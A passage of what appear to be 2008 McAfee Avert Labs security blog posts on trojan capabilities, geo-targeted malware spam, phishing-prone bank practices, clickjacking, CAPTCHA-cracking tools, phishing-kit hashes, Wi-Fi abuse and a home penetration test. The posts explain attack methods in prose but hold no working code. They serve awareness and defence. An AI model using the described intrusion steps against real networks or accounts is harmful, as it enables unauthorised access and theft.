• “VER” - sets a “version” key underneath the Windows Registry path “HKEY_CURRENT_USER\Software\Microsoft\InetData” to a particular string
• “EXE” - updates itself by downloading a new version, storing the resulting executable to the Windows path. The filename is randomly chosen, depending on the current time
• “DL” - downloads an executable from the Internet (but doesn’t run it)
• “DL_EXE” - downloads and runs an executable from the Internet
• “DL_EXE_ST” - downloads an executable from the Internet, adds its path to “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” and executes it
• “REBOOT” - forces the computer to reboot

An additional spam run targeting Swiss Internet users has been reported by the “Reporting and Analysis Centre for Information Assurance MELANI” just yesterday. The mail, written in German language, promotes a Swiss adult web site hosting celebrity videos. Subjects include “Bl*wj*b with Madonna” or “Britney Spears in front of porn camera – scandal“. When following any link contained in the mail, the user is directed to one of many different malicious domains showing pages similar to the one seen below.

Just like with the fake banking web site mentioned above, the videos presented on this celeb page are told to not work without a codec - too bad! This time the user is bribed with a high definition video plugin named “Adobe Player HD plugin”. Again, this of course isn’t a missing codec but rather a trojan aimed at downloading further malware. Noteworthy about this downloader is it’s contacting a web server with a traffic management system installed - contextual to the user’s Geo-Location, different malware is delivered. While, for instance, a user from Germany will be sent a file called “de.exe”, …

HTTP/1.1 302 Found
Date: Wed, 10 Dec 2008 15:33:58 GMT
Server: Apache/2
Set-Cookie: …
Location: http://***-*****.com/de.exe
Vary: Accept-Encoding,User-Agent
Content-Type: text/html

… a user from Switzerland will get “305.exe”:

HTTP/1.1 302 Found
Date: Wed, 10 Dec 2008 15:39:48 GMT
Server: Apache/2
Set-Cookie: …
Location: http://***-*****/305.exe
Vary: Accept-Encoding,User-Agent
Content-Type: text/html

By comparing the malware currently spread by the malicious host, Swiss residents are delivered a variant of the same “Infostealer” family as seen in the “Bank of America” spam campaign shown above. Users from Germany are delivered a spam bot instead. So spam mails are sent from victims in one country, and information being stolen on computers of victims from another country.

The “FormSpy” (a.k.a. “Infostealer”) malware is blocked by Artemis as “Generic!Artemis (trojan or variant)”, additional coverage is in the 5461 DATs.

Many of us consider the Internet community to be a collective conscience, and consider the dirty schemes that tricked us once upon a time to now be common sense no-nos. Unfortunately, newcomers to the Internet community do not (yet) have a means of digitally absorbing all of the wisdom we’ve learned as web-surfing veterans. While today, you’re likely to look at someone who’s never been on the Internet as an alien life form, many new users are surprisingly logging on for the first time. Even in the US, the advent of cheap broadband is leading more schools, offices, and households to incorporate the Internet as an everyday way of life, and with that come a lot of nuances. In addition to this, scammers are getting smarter and finding new ways to trick seasoned Internet users. Even if you’ve been online for years, it can sometimes be difficult to spot new tactics being used to e-mug you.

While it’d be nice to think that common sense will always protect you, common sense alone has shown to be only marginally effective against the evolving online fraud syndicate. The FBI’s 2007 IC3 summary reported over 200,000 complaint submissions of online fraud, up from the mere 16,000 complaints received when the program began in 2000. Of the complains received, the typical kind of scam that would give your common sense a chance to flex - Nigerian 419 scams - represented only a mere 1% of all complaints, suggesting very few people are falling for these anymore. Instead, the new big-ticket item in the underworld of fraud is phishing. Phishing is considered by the FBI as “foremost” among email based scams, and seeks to illicit information about a person’s identity – such as credit card and social security numbers, and other information which can be used to commit crimes of identity theft. Phishing is a smoke and mirrors trick designed to fool you into thinking you’re logging into your bank or credit card’s website, when in reality you’re using a mock-up site designed to steal your personal information.

Online fraud and identity theft crimes consisted of over 17% of the total complaints received in 2007. It’s no surprise that online fraud is growing given how lucrative fraud scams can be. In 2007, over $239 million was lost by those reporting complaints to IC3. This set a new record for financial loss, and yet the number of actual complaints was at a three-year low. The complaint count was similar to that of 2004, yet in 2004, only $63 million had been lost to scammers. This suggests that scammers have become much more efficient than they used to be. Today’s criminals clean people out of more money, and do it with less effort.

It’s no surprise too that 32% of these scams were perpetrated using a website, and 73% involved email correspondence. It’s relatively inexpensive to deploy a phishing site kit on hundreds of hacked or free web servers and then send out millions of email messages to hook the few unsuspecting individuals who fall for the bait. While a specialist in the field might recognize the site to be a forgery, the average computer user has only a few basic instincts to know whether they’re safe.

Most Internet users will apply some form of common sense rules when visiting a website. The most valid question they can ask is, “does the URL in my address bar match that of my financial institution?” Simply applying this one basic rule can thwart a majority of phishing attacks. Applying the wrong types of common sense assumptions can be dangerous. Replies from victims such as, “the website looked real to me”, and “the link in the email looked right” are not uncommon, and are usually the result of being taught a few bad habits.

Scammers are working actively to outsmart their victims, but what the victims might not know is that there is another factor also working against them: their financial institution. Even after years of knowing how phishing sites operate, many banking and credit card institutions continue to teach their customers bad habits by conditioning them in ways that poison their common sense. None of this is done maliciously, of course, but somehow their webmaster never got the memos about phishing. Some of the bad habits your financial institution might be teaching you include: 

Click This Link

After years of knowing this is a bad idea, many legitimate websites are still sending email messages to their customers with clickable links. Clickable links have been abused by phishing scammers since the beginning because they allow you to craft a web address that displays the legitimate institution’s website URL in the email, but will take you to the scammer’s mock-up website when you click on it.

Using clickable links in correspondence conditions the customer to fall victim to these types of scams, and causes them to ignore the URL in their address bar. 

Email sent from your company should never instruct a user to click on a link. Instead, instruct them to simply visit your website. If you must provide a URL, provide it in plain text and keep it simple.

Paste This Link

Almost as bad as clickable links is the practice of instructing a customer to copy and paste a link into their browser. This is another common bad habit that has been exploited by scammers to steal your personal data. Many scammers simply remove the leading www prefix, or the http:// protocol prefix to avoid filters from seeing the URL in their email. This conditions the customer to assume the link is valid because it’s not clickable, and might also prevent them from visibly confirming the URL.

Email sent from your company should never provide a URL so complex that it must be copied and pasted. Provide only the main URL to your website, which the customer should be able to identify with. Anything overly complex should be linked to from the website once they get there.

Multiple SIgn-On Domains

A customer can only know if they’re visiting a legitimate website if the URL in the address bar matches. Many large banks, however, have taken on the poor practice of using multiple domains, and sometimes even using outsourced, third party URLs, to sign customers in. This confuses their customer and conditions them to disregard the URL in the address bar, since they’ll never know if it’s right or not.

Your company should use a single sign-on page and only one domain name for a customer to identify with. Like the entrance to a concert or other special event, your website should funnel everyone through one central line. This will avoid confusing your customer about which domains you’ve registered; most customers don’t know how to look this information up.

Multiple Sign-On Pages

In addition to using multiple sign-on domains, many companies use different sign-on pages to log into different types of accounts, or present different pages depending on where the customer is navigating. This desensitizes the user to the look and feel of your website, making them more likely to miss the variations in counterfeit websites, which might have otherwise raised a red flag. 

The customer should not depend on whether a website “looks” real, however when they are desensitized to the layout and branding of your sign-on page, you increase their likelihood of falling for a scam. It is said that bankers are the best at spotting counterfeit currency because they work with the real thing all day. Your customers can be taught to spot a forgery simply by using one central sign-on page. This page should also have a simple URL that the user can become familiar with. All other pages on your website should link to this one sign-on page.

Log In To Verify Your Account

Scammers have used various forms of fear mongering for years that have tricked victims into logging in to verify account details. Some of these scams include informing the victim that their account is suspected of fraud, that the account has been suspended, or that they will need to verify their information to avoid an account lock. All of these notifications advise the victim to make an urgent effort to log in.

When a customer is under duress, they are more likely to skirt their normal common sense checks to address the problem. Companies engaging in this same practice cause their customers to get into the habit of responding to these types of urgent notifications, increasing their chances of falling victim to a bogus one. If a notification is urgent enough to warrant an account lock, it is important enough to be delivered to the customer via telephone, and with proper verification procedures to identify your company to the customer. Sending urgent messages via email is only inviting trouble.

Security Images

Many websites employ security images to convince the user that they can feel safe logging in so long as they see a teddy bear, a train, or some other image they choose from a library when creating their profile.  As phishing scams become more complex, scammers’ websites can easily start acting as proxies to the legitimate website. This isn’t in widespread use yet, but a few isolated incidents have been seen, and the technique is easy to craft: when you enter your username into the phishing site, the site turns around and queries the legitimate website for your security image. It can then display the security image to the customer to gain their trust.

Security images and other enhancements are an added layer of security, but your customers should be aware that they can be easily spoofed. Instruct your customers to rely on the website URL, rather than a security image, and to only use the security image as an added means of verification.

In addition to these bad habits, many companies avoid addressing the problem entirely, and teach their users that they can protect their account by employing policies such as strong passwords or usernames requiring a digit. Security questions are another common layer added to websites that don’t do much to them more resilient. None of these techniques will necessarily have any affect in strengthening security against a phishing attack, because the customer is providing the information directly to the scammer’s mockup site. Even revolving security questions can be easily phished when the scammer is familiar with the questions prompted by the institution.

Identifying legitimate correspondence is the first line of defense a customer has in avoiding a scam. The best thing you can do as a company is to inform your customer that you will never prompt them to click on or paste a link, never instruct them to enter their credit card number online, and familiarize them with the only website URL they should ever associate with your company.

Unfortunately, many websites still teach bad habits. Large banks continue to use multiple website domains, rather than centralizing all of their sites under a single web address. Other companies have abandoned common sense entirely and send email closely resembling existing phishing scams, complete with hot links and urgent requests. Facebook was recently slammed in the tech community for sending clickable links to their users prompting them to verify information in their account. They’re not alone, however, as many other popular online institutions have been known to follow similar practices.

In July, we published findings that SPF/DKIM usage was declining among the Fortune-500 companies. Of the 500 wealthiest companies, less than half were implementing the simple, free anti-forgery countermeasures to protect users from spoofed email. You can read more about this at this link.

Businesses can’t prevent their customers from being scammed, but they can help to educate and condition them to recognize legitimate correspondence. The first step in doing this is to encourage sound practices when visiting your website. By helping your customers avoid becoming victims, you’re helping to avoid headaches that will ultimately become yours, and ensure that your customers remain satisfied ones, likely to return.

Today McAfee released its Virtual Criminology Report, our annual study of global cybercrime. We found that cybercriminals are targeting their scams to play off of the economic recession, and governments need to be doing more collaboration to face the problem.

The economic downturn affected cybercrime scams almost immediately. As soon as banks started struggling and mergers and acquisitions became commonplace, we started seeing an immediate increase in banking scams asking users to ‘update their account information’ before the bank changed hands. With almost all of today’s malware being financially motivated, even cybercriminals are looking for more business in tough economic times and are really stepping up their game.

This represents an evolution in the trend of cybercriminals getting smarter and faster about what they do. When news of a specific banks going under hits, scams and malware utilizing that messaging will emerge the very next day. The same happened with threats throughout this year’s presidential race as well as post-election; when President-Elect Barack Obama messaged malware emerged as early as November 5.

The environment of fear and anxiety in consumers that is being caused by the downturn also provides opportunity for cybercriminals to lure consumers into what they think are ‘internet sales marketer’ positions, where they are actually unknowingly assisting in criminal activity as money launderers. We have been seeing an increase in the number of these job postings and recruitment emails promising job seekers will ‘get rich quick.’ The scams are also strategically worded to place high on Google job searches, and are of course designed to look like legitimate job postings.

It is more important than ever that computer users educate themselves in safe searching and safe computing habits. Technology alone cannot solve the problem. Education alone cannot solve the problem. Both combined, however, can enable us all to use the Internet the way we want.

Download your copy of the report here.

Educate. Advocate. Protect.

Today marks another day of momentous change for McAfee’s research teams.

I just spent two days with my new colleagues from Secure Computing and some of my team members from McAfee Avert Labs. It was two grueling days of discussion and education as we both came up to speed on our research methodologies and technologies. Let me say that I am truly excited to be working with Dmitri Alperovitch, Sven Krasser, and Paula Greve, who head up the research group there. These are sharp and capable research leaders who have done amazing things. TrustedSource is a great technology and has so many applications that McAfee can leverage. Once our new Artemis technology begins to leverage TrustedSource capabilities McAfee will become the undisputed leader in security intelligence in the Internet “cloud.” Together we will see millions of spam messages, evaluate thousands of web sites, and see thousands of new pieces of malware–all in the span of 24 hours. We now have the ability to see and react to the threat landscape better than ever before. This is something that every McAfee product, technology, appliance, and SAAS (software as a service) solution will come to leverage, differentiating themselves from the competition even more.

At first we thought we would have overlapping technologies, but this is definitely not the case. In combating spam, web, and malware we have approached these threats from very different directions; thus we find our technologies very complementary. In the case of anti-spam protection, for example, we have two technologies that provide better than 99% detection using very different methodologies and approaches. Once combined, we will have the most robust solution on the market. The same holds true for the SmartFilter and SiteAdvisor technologies, as well as our malware solutions.

Today we have very good security intelligence. Tomorrow, with a bit of nurturing, we will have great security intelligence.

We welcome Secure Computing to the McAfee research family.

Jeff Green
Senior Vice President
McAfee Avert labs

You may have read in the press recently about landfill ISP McColo being de-peered. Spam is just part of this story, though probably the most visual and media friendly, please don’t see this ongoing situation as mostly spam related. Spam is simply the most visible tentacle of this octopus.

Our esteemed blogmaster Ed has been moaning about getting something on the blog about it & I wanted to dig out something meaningful for our readers so I contacted a close partner of ours and got some real mailserver stats.

Quite the haircut I’m sure you’ll agree.

You can read my previous blog about bots calling home to mother-ships (often via proxies) if you’re interested as to why this had such a sudden and dramatic effect.

Enjoy the lower load averages while they last though

This is no reason to rest however, we’re still as busy as ever in the labs and we’re watching as intently as ever. The child porn sites are already on a transatlantic move for instance and we’ll be calling our colleagues at the IWF today for sure.

Look what we ran across in our spam traps recently:

$50 for a survey! It’s our unlucky day…

[Click for full size]

As you can see from the partially obscured email address it is clearly NOT from JP Morgan Chase!! I hope this variation on the theme is suspicious enough to set off most peoples “too-good-to-be-true” radar. We can expect this type of attack to get much more convincing real soon no doubt.

Following on from Pedro’s blog yesterday [Election day is over] and the recent news that the computers of both Campaigners were hacked during the summer [Security focus blog], I wanted to give you a short overview of the different Malware we saw here at McAfee Avert Labs during the US Presidential race.

Due to the high media attention which Barack Obama received, it seems that the Malware Authors specifically targeted him instead of John McCain as a means of luring users into clicking on the Malware.

One of the first pieces of malware we saw which exploited the campaign was in August. This was a spammed email which contained a link to get_flash_updates.exe . The email contained the subject “Obama bribes countrymen to win votes”, if the user followed the link it would download Get_Flash_updates.exe which was a BackDoor-DNM Trojan.

The above was similar to a spamming campaign which Alex Hinchliffe blogged about earlier on this year [Super Wednesday].

A few weeks later we received a file called Obama_*.exe (I renamed the file due to it containing offensive language) which was detected as PWS-Banker.cs. The file used the Window Media Video icon and upon execution dropped the following file: %WinDir%\system32\siemens32.dll. The malware also loaded a video in order to make the user believe that it was in fact a video file.

Yesterday we received a file named BarackObama.exe which Pedro blogged about [Election day is over]. We also went Low Profile on the Generic PWS.y!6F939359 which was being talked about on several different sites [Washington Post] [NetWork World]

Finally today we also received a new one which was named Beat_Obama_178.exe. This was a simple downloader which attempts to download a file from a Chinese website. This will be detected as Generic Downloader.Z in tomorrows Dat release.

We expect to see several more malicious files using the US Presidential election as a means of Social Engineering in order to trick users into executing them. So please be on the look out and keep your security software up to date.

So, election day is over and the United States has a new president-elect. For malware writers, however, the election is not over yet! Here at Avert Labs we are still seeing seasonal election malwares. An interesting one just arrived: It is called BarackObama.exe of all things. What’s more, it has a American flag icon! How patriotic is that?

It turns out this BarackObama.exe is actually the familiar PWS-Banker Trojan, which steals passwords and other user data about bank accounts and sends the information to the malware writer. Another interesting point is that the bank target is not an American bank, but a bank in Peru.

So, it doesn’t matter if you are a Democrat or Republican, the American election remains a nonpartisan opportunity for malware writers to get into your computer–using Barack Obama, John McCain, or even Ralph Nader.

I never thought I’d see the day!

ICANN found it’s dentures down the back of the sofa and taken a bite out of the criminals domain registration empire. ESTDomains will no longer be a registrar as of Nov 12th. [pdf]

So I’ve got a question… Who’s got the balls to take on ESTDomains problems “customers” ?

“ICANN Seeks Expressions of Interest from Registrars to Receive Bulk Transfer of Names from De-Accredited Registrar EstDomains”

I recently presented at APWG to encourage the anti-phishing community that registrars and registries can actually act rather than pleading innocence or the classic “our hands are tied” type excuses. In the case of fast-flux they are probably the only ones that can help in fact. I encouraged participants to point out that registrars and registries are guilty of acting illegally in many jurisdictions by facilitating illegal or infectious sites.

The general stance was that if Directi can clean them out then so can anyone else.

I pointed out that between 2 registrars (EST and Klik/Vivids) about $1.5M of revenue had taken place with Directi (who gives a healthy proportion of it to Verisign Etc…). I concluded with a slide to motivate participants to “Hug a Registrar” and I implore our readers to help out too. Anyone scoring over 30% on this uribl page is a prime candidate for advocates in the community to reach out and “help”.

So here is my top 5 for today:

#1 Moniker - Infested with spammers and pirated software sites. (MSOffice isn’t €79.95 delivered in a zip file)
#2 XIN NET - This is where the Pill spammers moved to and have given the .cn TLD a bad name.
#3 35 Tech & OnlineNic - Same as above but with more variety in pill sites and some casinos thrown in too.
#4 Planet Online - (Surprised to see them so high) Home of the unique URL “snowshoe” spammers ? almost legit ? The real world doesn’t care for their bulk and whois protected domains (via directi’s Logicboxes), or fake contacts.
#5 Dynamic Dolphin - Owned by Scott Ricter’s Media Breakaway, formerly bankrupted OptinRealBig . MS won cases against him in New York in 2005. This accreditation is probably against ICANN’s policy. These days they generally annoy via social networks.
#Bonus - *.directNIC [Mikko's open letter]

This is almost 2 years too late and took far too much media attention to shake their tree. The worst of the criminals left EST for other registrars after the “defecation meets the rotary oscillator” in August, but never the less, that (so I’m told) this is quick for ICANN

Hip Hip…

I am in Las Vegas for the McAfee Focus ’08 conference, and I just heard that French President Nicolas Sarkozy suffered, in September, a case of online bank fraud on one of his personal accounts.

Authorities said hackers were not aware of the identity of the owner of the account. We know only that they removed small amounts of money (an anonymous well-informed source told Agence France Press it was for opening mobile phone accounts). Perhaps by taking small amounts the crooks wished to ensure the validity of the stolen information and wished to verify the victim’s lack of concern. But they couldn’t have picked a worse target. The entire French police force is chasing them.

It is difficult to imagine my president as victim of phishing, but anybody can be attacked by crimeware while browsing the Internet via a not well protected computer. Remember, it is not necessary to visit inappropriate web sites to catch malware. In December 2007, for example, I explained in this blog that the site of the French embassy in Libya was affected by an IFRAME injection.

The most probable origin of Sarkozy’s identity theft is “carding.” As I wrote in May, dump tracks lists are for sale by the thousands, and many hacked credit card readers are on the market. Perhaps one of them involved Sarkozy’s credit card during one of his numerous foreign travels.

Relating to this fraud, Luc Chatel, secretary of state for consumer affairs, said there has been a 9 percent increase in Internet banking crimes this year in France.

[This entry was updated on November 3.]

Lately, the topic of “clickjacking” has gained popularity in discussions on the Internet. It is a new type of web attack. I decided to find out what it’s all about.

I found an online video from OWASP NYC AppSec 2008 here. In the video, Jeremiah Grossman and Robert “RSnake” Hansen reported this new vulnerability in a presentation titled “New Zero-Day Browser Exploits-–ClickJacking.” I also found a demo of this attack here.

In the videos they describe only parts of the vulnerability, but we can learn enough to gain a basic idea of what clickjacking is.

To explain, I’ll use an example. You have a web page A controlled by an attacker. A contains an IFRAME element B. In a clickjack attack, B would be set to transparent and the z-index property of the layer set to higher than other elements of page A via cross-site scripting. The area of B will also need to be so big that the user can easily click its content. The attacker places a button in B that leads to any action he wants. Then the attacker places some buttons on page A that will attract users. The location of the buttons in B must match the buttons in A so when users appear to click a button on page A, they are actually clicking the button in B because the z-index property of B’s buttons are higher than A’s buttons. This attack uses DHTML and does not require JavaScript, so disabling JavaScript will not help.

This vulnerability affects multiple web browsers. Unfortunately, no patch for it is currently available, so users should be careful. The vulnerability has also been found to affect Adobe Flash Player, the most popular rich-media Internet application today. Adobe has released a security advisory and provided a workaround.

We will continue to watch for new information about this vulnerability.

Issue 5 of the publication formerly known as Sage has been released. This issue we take aim and tackle the rather murky subject of social engineering. We have nine excellent articles for you from some of our finest researchers as well as two academic experts. Some of the topics covered include:

The Origins of Social Engineering
Social Engineering 2.0 - What’s Next?
Vulnerabilities in the Equities Markets
The Future of Social Networking Sites
Typosquatting - Unintended Adventures in Browsing

Many aspects of social engineering are dissected and investigated as well, some not found anywhere else! Definitely worth the download and read.

Available here.

We’ve already written about CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart), the mechanism used to protect web sites, forums, and mailing systems against the automatic creation of accounts and contents. As my colleague Tad Heppner wrote in his November 2007 post, most common CAPTCHA systems work by generating distorted characters, text, or pictures that can be easily recognized by the human brain but present significant difficulty for computer-based optical character recognition or other image-recognition systems.

It should come as no surprise, however, that spammers continue to try to crack CAPTCHA. We’ve now seen a new version of a professional spammer tool on the web. XRumer 5 sells for $520 and promises advanced CAPTCHA decoding methods.

For a long time spammers have searched to defeat CAPTCHA mechanisms to create fake email accounts to send spam. Before telling you more about this new crooked utility, let’s review some older techniques used by spammers.

As shown in the following image (source XMCO), the most common CAPTCHA methods can be broken.

The first method of cracking is manual. People from developing countries offer services. The competition is intense. On some dedicated forums, proposals surge in from Vietnam or Bangladesh. They claim that lots of people are ready to work 24 hours a day to process hundred of thousands of CAPTCHA. Rates vary from $8 to $1 per 1,000 CAPTCHA.

A less expensive solution consists in using private individuals to do the work free of charge. I am sure some readers remember this unusual offer, in which it was possible to undress “Melissa” in exchange for some CAPTCHA work. This allowed a spammer to create fake Yahoo Mail accounts.

It is also possible to find free web services. The CAPTCHA Killer web site offers such services. Its designer claims the offer “is 100% focused on increasing accessibility on the Internet” for the “1 Million Americans that suffer from blindness.” The service makes available an API to automate the process. However, I was not surprised to read a cross-reference on that site saying they have been notified that using CAPTCHA Killer with Myspace was against the latter’s Terms of Service.

A very technical approach uses rainbow tables, in which each CAPTCHA image is associated with its character string. In March 2008, someone nicknamed Maluc created PHP scripts to download, extract, and save thousands CAPTCHA images from Yahoo, Google, and Hotmail. When finished, each collection will help spammers create new recognition tables or verify the accuracy of its OCR algorithm. When successful, only one millisecond is needed to compare a new footprint with the ones included in the database. You have to pay between $1,500 and $5,000 for such algorithms, which suppress the noise, create a black-and-white picture, break it into segments (one letter per segment), and identify the character.

A programmer called Wangrun in the Chinese province of Anhui says he developed software to decode CAPTCHA systems. Depending on the complexity of the CAPTCHA image, he charges between $500 and $6,000 per decoder. No price is quoted for the most difficult images but, in a comment, he writes it is feasible. Wangrun declines to say what his customers use the decoders for, but says he has “very many” of them.

Spammers can also use zombie machines to help them crack CAPTCHA. We’ve read on the Virus Bulletin web site that compromised systems making up a large botnet were recently used to help in the registration process for Windows Live Mail accounts. When the bot (detected by VirusScan as Generix.dx) asked for registration, it received a CAPTCHA and immediately presented its image to a central server that attempted to decode it and returned the result. The decipher technique was successful only around 35 percent of the time, VB said, but a new idea was launched. The fact that large numbers of infected systems were running repeated attempts suggests a high number of new accounts for spamming were created at that time.

Finally, turnkey tools are another method for defeating CAPTCHA defenses. XRumer 5 is one of them. It can flood message and links forums, guestbooks, blogs, wikis, etc. It automatically finds and fills in required fields with no need of a browser. If the forum requires registration, the program will register, log in, and post the spammer text. XRumer goes beyond JavaScript protection, pictocode protection (typing a number displayed in a box), and protection by e-mail activation. If a CAPTCHA image is detected, the program automatically downloads it, analyzes it, and fills in the form.

Version 5 can work on most recent versions of popular engines such as VBulletin, IPB, and phpBB, according to its creator. XRumer can also create accounts on gmail.com for posting. And its clients seem happy. One of them wrote last week on a forum “all that for only $500? It’s very cheap! I’d easily charge 2k for that. Solving gmail captcha is no joke. I paid 4k just for that from an OCR developer. …”

XRumer is also able to solve the “pick the cat captchas” presented in picture below.

On October 3, XRumer’s maker explained he analyzed many forums and discovered that most of this type of CAPTCHA used identical pictures. Thus XRumer can distinguish them by their sizes in bytes. And it concludes: “It’s so easy, isn’t it? Oh, they can make some distortion on images? Well, we have a time to improve our algorithm. We analyze forums, blogs, guestbooks permanently, and there is one important thing: that type of captchas used not more than 0,01% of resources (1 of 10,000 sites).”

Once again, we are reminded that malware design is a business. And once again, my searches drive me to Russia, where criminals create and employ malicious software as well as engage in identity theft and virtual prostitution. The company or individual behind XRumer appears to be the same as that which proposed an automated sex-talk service called CyberLover.ru in 2007. One name I got from a whois request today is Alexander Ryabchenko. When the media pointed the finger at him in 2007, Ryabchenko emailed to Reuters that he could not be accused of identity theft with the CyberLover concept. He explained “the program can find no more information than the user is prepared to provide.”

If anyone should ask Ryabchenko why he commercializes XRumer, I suggest he repeat the CAPTCHA Killer web site argument: to help the million people suffering from blindness.

Q: How do you want to build a client base for your phishing kits?
A: Give the popular ones away for free. Yes FREE, and as blatantly as possible, with one-click satisfaction, right on the homepage of a web site.

I suspect that this is a shareware-style, lead-generation setup–as the phishing kits appear to be of relatively poor quality. (So poor in fact that I expect the most experienced brands to be sending takedown notices for them before the phishing emails were actually sent.) Some of the kits also appear to have encoded parts indicative of being backdoored, too–I guess they gotta pay the hosting bill somehow!

Kudos to the host in Germany for taking down the site next day; you know who you are.

223ad6770c4ff635083b70391d3c04de Abbey[1].Co.Uk.zip
f34e8ce8e373796a30dc7e0730c4ed9e Bank of Israel (2008).rar
799c1ba68e87a33aa225655931996f1f BankofAmerica[1][1].Com.zip
76282eea7ab203c51b05c660577a4002 Cahoot[1].Co.UK.zip
880a57f271d4d46da92738e3962e49b1 E-Gold[1].Com.zip
fa1a96c0b1927177b2ca2c8bd6c5e970 HSBC[1].Co.Uk(CC Info).zip
376bd1c17baa77a870e12747338fe64a HaliFax[1].Co.Uk.zip
a190290c4643d95fb87537856474e84f LloydsTSB[1].Com.zip
0c23bed37791a123e7635cef153d21f9 MoneyBookers[1][1].Com.zip
c5d10b25075e4298bf098dc253a408e6 New paypal.rar
ad7e3dd00939eb5e8d56092aaa0e24bc Padeel.rar
499626e041c80bdec9f80be29364b1b7 PayPal[1][1].Com(T).zip
5eec8797fc8174bf432ddce192d1b1d4 PayPal[1][1].Com.zip
89e94a1843c25dc6424cf542573a4b01 UsaBank[2008].rar
36be827f4ee6e494ee1935556ab3a2a7 Wachovia[1].Com.zip
e1ba19f799d604656ebd4dd9c8228913 Westren nion 2008.rar
62f99023b12214ecac05cdf0ad0b82fe ibank.barclays.co.uk2008.rar
ee89d38f27deb6c94391c764913d9490 scams-orange.zip
afcef45174c5b1ec54db3e8bccfd285a usa.visa.com.rar
6c9030c9c5af0b9343ef72eb458641fd www.Free.Fr.rar
66671d90a86f618522a64caba5bc91a8 www.ebay.co.uK2008.rar
dbfb0c80bada183e47ae031ebb535116 www.paltalk.com.rar

There is an interesting back story to this incident, too: All roads of further investigation lead back to France. The details of which have been with the national police for some time now (thus the delay in posting).

Laptop and notebook theft is a major problem; it rates at between 3 percent to 7 percent of reported thefts, according to experts. In 2006, a company making computer-tracking products estimated 750,000 pieces of equipment a year were being stolen.

Another tracing firm said FBI statistics show two million laptop and notebook computers were stolen in the United States in a recent year. And 50 percent of 403 senior managers surveyed in the Computer Security Institute’s 2007 Computer Crime and Security Survey said their organization experienced laptop or mobile-device theft within the last 12 months.

In June 2008, Dell sponsored a Ponemon Institute study about lost laptops at airports. In this paper, we discovered that 12,000 laptops were lost in U.S. airports each week. Another press release indicated there were more than 3,300 lost at the eight largest airports in Europe, the Middle East, and Africa. Even if a good many are rapidly retrieved or end up at the lost-and-found desk, others vanish into thin air. Somebody, somewhere will be very happy with them.

I decided to blog on this subject because it was just yesterday that I was a speaker at the Eurosec’2008 conference in Paris. Just after my talk, someone working in the counterespionage and counterterrorism circles explained that data theft and reselling equipment on the black market were not the only targets of thieves. 30 percent of these thefts are dedicated to industrial espionage, he said. In 70 percent of the instances, they are stolen to attempt unlawful acts of software piracy, for downloading pedophilia images, browsing terrorist and extremist web sites, exchanging information via blogs and forums, and for sending terror email for intimidation or for claiming responsibility for bombings.

When a burglary occurs, thieves often use stolen cars. Some days after the crime, the police often find the charred car at the bottom of a forest. Now, the same method is being used by cybercriminals; after it’s been used, the computer is destroyed and never found again. And it’s far easier to steal a laptop than an automobile.

People don’t seem to seriously care about Wi-Fi security yet. Inspite of oft-repeated warnings, ignorant folks with unlimited bandwidth plans believe that they are doing a social service by allowing neighbors to leach their Wi-Fi freely. What they fail to understand is that by doing so, they can become an unwitting accessory to cyber crime.

Instead of scouring for anonymous proxies to stay faceless on the internet, cyber criminals are increasingly targeting unsecured Wi-FI networks to get the job done. A combination of war driving tools such as NetStumbler along with a listing of default router usernames and passwords is all it takes to freely connect to unsecured Wi-FI networks. Especially since most Wi-Fi routers use default security settings that come pre-installed by the vendor rather than it having being configured by the end user.

SOHO routers log every connection and DHCP lease but these logs are flushed once the router is rebooted. If an attacker has access to the administrative console of the router (thanks to the default password), once their nefarious actives have been carried out, a simple restart of the router will erase all tracks.

The extent to which an unsecured Wi-Fi connection can be abused is purely left to imagination of the attacker. Putting on my Dr.Evil hat, here are couple of wicked acts a Wi-Fi hacker could commit and get away undetected using an unsecured network.

• Download child pornography
• Download copyrighted movies and music via P2P
• Download Warez and abuse your bandwidth
• Send bomb hoaxes, terror or threatening emails.
• Send spam (sexual aids, pharmacy or money laundering scams)

Any of the above acts could lead to law enforcement authorities knocking on your door. This is not mere speculation and many unsuspecting people have fallen victim. To quote a high profile example, in the recent serial bomb blasts in India, terror emails that took responsibility for the blasts were sent from unsecured Wi-Fi connections. And it was the unfortunate owners of the unsecured Wi-Fi connection that were subjected to police questioning and house arrest.

In addition to using an unsecured Wi-Fi network for malicious purposes, an attacker can also use it to steal personal information for identity theft. For example:

• Infiltrate and break into internal machines
• Modify DNS settings on the router to point to a rouge server.
• Sniff Wi-Fi traffic for usernames and passwords

The above discussed scenarios are neither speculation nor an exhaustive listing of different ways for abusing unsecured Wi-Fi networks. These scenarios are being enacted by criminals everyday around the world.

Now why would want to be an unwitting host to criminal activities emanating from your IP address or make yourself vulnerable to identity theft? Be a responsible Netizen and please secure your Wi-Fi connection now!

I was at a friend’s house this past weekend when I asked to connect to his wireless router with my laptop. This friend was not computer savvy so I wasn’t surprised to find that security was not configured on his router.

This reminded me of an article (Secure You Wireless Router) a colleague of mine at Avert Labs had written several months ago about how more and more homes in China nowadays have wireless routers, but very few people bother to secure their routers.

I proceeded to lecture my friend about the importance of being security-aware, and the dangers of not being so - identity theft, stolen passwords, private documents, pictures, etc.

To demonstrate my point, I asked his permission to perform a penetration test which he agreed to.

I proceeded with the same steps described in my colleague’s article. I obtained an IP on the unsecured network, found the router’s IP, opened up a browser to that IP and was presented with the router’s administration login page. A quick search online easily gave up the default admin password for this router - “admin”. I tried that and sure enough, got into the admin page.

Next I checked the logs on the router and identified an active host on the network that was not my own. I then tried to open a NetBIOS NULL session with the host which worked. So far everything I tried had worked on the first attempt. Getting the NULL session opened up some opportunities for some good information gathering. For one, I determined that the host was running Windows 2000. More interestingly, I was able to get a list of user accounts. All without the need for a username and password. Only one of the accounts sounded like it was user-created. I tried to map a drive using that account with a blank password, and failed. I tried a few more times before giving up on guessing passwords.

I was using my work laptop so I had a Foundstone Enterprise install handy. I scanned the host for vulnerabilities, looking out for anything remotely exploitable. I came up with a handful, but one check jumped out at me - “Administrator Account Has No Password”. I tested this by mapping a drive with the administrator account and a blank password, half hoping that it was a mis-detection. Alas, the map succeeded and at this point the demonstration was over. I now had full access to my friend’s filesystem, and now the possibilities were endless. Having an Administrator account with a blank password on a Windows machine is such an old security hole that I didn’t even bother to test it early on.

For the home user, here are are just a couple tips to get you started with security and get you in way better shape than my friend:

1. Secure your wireless network. Look up how to do it online or have your techie friend do it for you, like I did for mine.
2. Set a strong password for your Windows Administrator account. Better yet, disable the account.
